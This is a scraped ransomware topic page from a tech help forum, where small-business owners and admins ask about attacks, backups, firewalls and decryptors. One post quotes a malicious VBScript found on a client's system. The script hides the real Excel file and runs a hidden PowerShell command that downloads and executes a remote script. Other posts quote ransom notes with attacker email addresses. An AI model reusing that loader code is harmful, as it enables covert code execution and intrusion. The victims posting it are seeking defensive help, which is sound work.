Ransomware

187

Solutions

460

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.

Share tech news, updates, or what's on your mind.

Sign up to Post

I am looking to purchase Firewall. Anti-malware router.  It's for my small business of currently about: 30 people but will grow up to 100 units within the next 1-2 years.

The problem is we had a ransomware attack couple of days back and it's made us more aware.

The other thing to take note is: We don't have in house IT professionals, so we hire professionals from all over the world to work on our servers, they sometimes use RDP to login. or team viewer.

We use a VM ware, specifically promox, so we considering using: nakivo for back up also.

Our ISP guy recommended we used: Mikrotik RB/1100AHX2 Routerboard RouterOS Level 6 but he thinks we are small for it, and I think there's something better already.

I want to invest for the next 5years. I want to buy something that will take us to the next level, yet keep us funtional.

I don't know if we can also use it to block certain sites, manage bandwidth for users in the office, anything that'll generally keep security really up above board. Thank you.
0
Introduction to Web Design
LVL 12
Introduction to Web Design

Develop a strong foundation and understanding of web design by learning HTML, CSS, and additional tools to help you develop your own website.

Need to find out the last modified user on files. The reason that I need to know this is that we were hit by ransomware and need to know what computer or user it came from . It obviously got to via the network drives. When we right click the ransom note file , it says the owners are AdministratorS which is a group and not the user administrator. The interesting thing is that all other files that are encrypted now ( word, excel, .....)   have the owner as the original owner of the file . ( for example Jsmith) .   It would be very helpful to find the last user who modified the file . That's the user account that has encrypted the file . I had auditing turned on but it seems that since there was only 16MB limit, the security  logs were overwriten and we cant see which user account encryped all the files. I wounder if some Powershel commend can help with that.
0
Local server security.

I just got a ransomware attack. Hence I am asking for help to be able to achieve a great level of security for my server especially. and devices.

WHich devices should I get and why?
0
Ransomware. Last week. I gave my indian developer RDP access to my local server on a zte f660 router.  Normally I was using the HP MSR930 JG511A, but there was connectivity issues as we switched ISP, and they recommended we don't use it the HP anymore. strictly been relying on the zte.

Today,  I got the shock of my live, was like a movie. ransomeware. find attached.

1. Where is the issue most likely from.. is it from the router?... or from other sources?
2. Do I actually have to pay them to get my system back up.. cos I don't really have  a backup..
3. How do I prevent this?
4. How do I backup my local server.. it's  VM ware?
0
I'm looking for someone to help setup a new watchguard T15 and a BOVPN to an existing XTM25.  I know enough to be dangerous (maybe even that much).

I'd envision to have the person on the phone / remoted into my PC which would be on the LAN side of the T15 and I'd have team viewer connection to a PC on the LAN side of the XTM25 to set up the vpn (you are probably saying there's better ways to do the setup, but that's an indication of what I do and don't know).
0
I am looking for desktop imaging system recommendations. A little background, we are currently using Acronis but have outgrown it. I am looking into Quest Kace and SmartDeploy.

I am liking the features of SmartDelpoy much more and would prefer to have a more modern imaging system like that as opposed to Kace. I know there are other options out there like VMWare Workspace ONE, Microsoft System Center Configuration Manager, and CloneZilla.

Does anyone have any experience with any of these or would be able to recommend something better? We would prefer a cloud solution, if there is one.
0
Suddenly, 1,000s of files have been encrypted on our network drive.  DO WE PAY THE RANSOME?

Thousands of files in our ShareFile directory were encrypted between 12:01 PM and 12:59 PM yesterday. Of course in a matter of hours the encrypted files updated the good files on every laptop and employee's home machines that were running ShareFile.

The following string has been added to the name of every encrypted file:

.crypted_hoboblin@torquechat_com

Removing this string from the end of the filename does not help. Regardless of the type of file, .doc, .xls, .pdf, etc. the file will not open. Depending on the opening program says the file is damaged.

One file in the root drive of the ShareFile directory, named how_to_back_files.html, does open and reads like this when opened (the wording is exact):

YOUR FILES ARE DECRYPTED!
Your documents, photos, databases and all the rest files encrypted cryptographically strong algoritm.
Without a secret key stored with us, the restoration of your files is impossible

----------------------------------------------------------
To start the recovery process:
Send an email to: hoboblin@torquechat.com with your personal ID in the message body.
In response, we will send you further instructions on decrypting your files.
---------------------------------------------------------
Your personal ID:
93 C7 AC 4B ... (This goes on for several lines!)

Do we contact them? Obviously, they are going to want money. Do we pay? Go to …
0
Hi
Has anyone come across this ransomware "CCF25092017.pdf.id-006C0843.[sqlbackup40@cock.li].adobe".  This was a small system I put together for a friend of mine, 3 PC's and a small server running Zentyal 4. All data on PC's and server were encrypted. PC's were Windows 10 running Eset AV, using a 1 year old Sonicwall Soho Firewall.
Email runs through the Zentyal, but it's first filtered through Elive (Like Messagelabs).
PC's were so bad they would not boot, no usual message for ransom, only infected TXT files. This happened last Saturday around 3pm when nobody was on the system. There is one person who works remotely, but she say she was not on the system at that time.
No biggie here as I had it all backed up with the Proxmox hypervisor, had it all restored in an hour, then just rebuilt the PC's.
I'm just trying to figure out what happened here?
1
Got Infected by ransomware . The network drives are are encrypted . The issue is I can’t find the user that this started from . When I right Click the file , I get the owner is Administrators . What can I do to find the source computer . My fine server is 2016 server .
0
I have shadow copies enabled on the c:\ of a Windows 2012 server, I currently have it set to the below configuration;

Maximum Size: 35MB
Schedule: Twice a day at 06:00 and 13:00

The server also has Acronis Backup installed and running multiple backup jobs to a local NAS and also to Acronis Cloud.

I've noticed that the shadow copy setting maximum constantly resets to no limit but I can't understand why.

Please can someone offer any advise on why this occurs and how best to stop this being reset.
0
OWASP: Forgery and Phishing
LVL 12
OWASP: Forgery and Phishing

Learn the techniques to avoid forgery and phishing attacks and the types of attacks an application or network may face.

Has anyone had any luck with removing/recovering from nozelesn ransomware?
0
Good day

Having issues with Acronis Backup 12.5. I have used it on numerous servers but the one server is giving errors when remotly trying to install the agent.

Acronis Server details
Windows 2012 R2 up to date with patching

Target server
Windows 2012 R2 up to date with patching

I have even disabled AV and firewall on the target server. The installation from the Acronis server will run up to 38% and then fails with the below error

Windows error: (0x80070643) Fatal error during installation




Date and time

Oct 02, 2018, 11:09:50 AM




Code

4




Module

309

Message

TOL: Failed to execute the command. Remote installation


Additional info:

------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"management_server_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"remote_installation_addon_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 140
Module: 69
LineInfo: 0x448BB490B35D3532
Fields: {"$module":"remote_installation_addon_vsa64_10330"}
Message: Request to the remote installation service has failed. This may indicate a connection failure.

Error code: 101
Module: …
0
Hi, i have problem whith download Decrypting Cryakl from https://www.experts-exchange.com/articles/31579/Decrypting-Cryakl-1-4-0-0-1-4-1-0-FAIRYTAIL-Ransomware.html  (and decryptors.blogspot.com). Can help me whith download application?
I want test on CL 1.5.1.0. I have one pc whith this encryptor. I know that he was installed through the RDP, and have some files and log's. Maybe you decryptor can help.
It will then be possible to transfer the information to others.

Thank you.
0
There's a request for "Change runbook" that documents/records changes from Day 1
so that in the event of bad changes (malicious or inadvertent ones) being introduced
over along the line of changes, we can rebuild a server/system back selectively,
dropping the "bad" change so that we can bring up the system to a "clean" slate.

Was told it's not "Change Control" nor CRs that we are looking at here.

I've suggested that a 'bare metal' backup be done with incremental backups (think
EMC has one such product) but this is not what the team requires.

Any document, tools or method are much appreciated.
0
Dear Team,
   My Domain Controller Sysvol folder is affected by ransomware. DC is working fine now .
How do i recreate the sysvol files. I have only one DC and  no backup.

Server OS is Windows 2012.
I cannot reinstall DC since i have my exchange running.
0
Hasn’t happened but just wondering

If my google drive got hit and all files encrypted can I revert back to last weeks clean files ?

So I’m asking does google drove afford any sort of fall back plan for this scenario ?

Thanks
2
I have a user who is using the Watchguard VPN client software. They have been using it on Windows 10 Pro (v 1709) for 6 months without issue. The UAC prompt suddenly started appearing this morning when they try to run the software. No updates for Windows or the software have been installed. I have 60 other users that are using it without this problem also. I am at a loss as to why this would suddenly start needing elevated privileges to run. Does anyone know why this would happen or how to fix it? I am not going to disable user account control or give them admin rights.
0
hello all,

I am an owner of a small business in my town, I got infected by a ransomware, with .rapid extension, he wants a big ransom that I cant pay.
any solution for this version. please help.
0
I have Acronis for backups to tape.  I want to be able to backup "System State" of my DC.  What files or folders do I need to make sure get backed up?
0
Starting with Angular 5
LVL 12
Starting with Angular 5

Learn the essential features and functions of the popular JavaScript framework for building mobile, desktop and web applications.

I had this question after viewing Watchguard Firewall xFlow Configuration.
0
Customer has a watchguard T10 firebox firewall for a pos system.  The POS server connects directly to the trusted network port. no other computers connect to that network.  

Customer wants to setup an access point for wifi.  The watchguard has a 3rd port.  I want to activate it as a second network and allow wireless devices to access the internet.  

The watchguard firewall does not have built in wifi.  We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant, there are no office pc's or network printers.

Need suggestions on policy's, the device has contenfilter subscriptions.  I want to enforce them on the 3rd port too if possible.
0
We believe a client has been hacked but can't determine what the vb script is doing to the data, it doesn't look like ransomware.
can you help point us in a direction to what degree this hack could be.

below is the vbscript and a picture of a folder it has been found in. you will see that actual excel doc has been hidden and a fake excel doc in it's place. it looks like when the fake excel doc is run, it opens up the vbscript and the hidden excel doc

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use that object-groups to block any udp traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a Watchguard M200 firewall that we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the fulll 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I´m trying to use programm by James-Gourley to decrypt a 1.4.0.0 version of Cryakl  . Some files are decrypted correctly, and other files are not decrypted with  "encryption signature mismatch" message. Help me please. Sample files https://dropmefiles.com/769Q7   More examples of unencrypted files https://dropmefiles.com/CZ7xH
0

Ransomware

187

Solutions

460

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.